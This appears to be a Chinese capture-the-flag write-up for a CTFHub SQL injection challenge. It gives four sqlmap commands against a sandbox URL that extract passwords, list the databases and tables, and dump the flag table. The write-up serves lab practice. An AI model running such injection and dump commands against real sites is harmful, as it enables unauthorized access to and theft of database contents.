题目:
图1. 题目截图参考网站:
主要的解题点:
- 根据以往的知识,分析可以采用union的形式;
- 但是还是要善用工具,使用sqlmap可以一步到位
这里列明一些其中的关键步骤:
其实本题只要按照sqlmap官网上给出的demo操作即可
-
Step1:
图1. 破译密码
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password
-
Step2:
python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs
-
Step3:
图3. tables情况
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli
-
Step4:
图4. 拖库
python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli
网友评论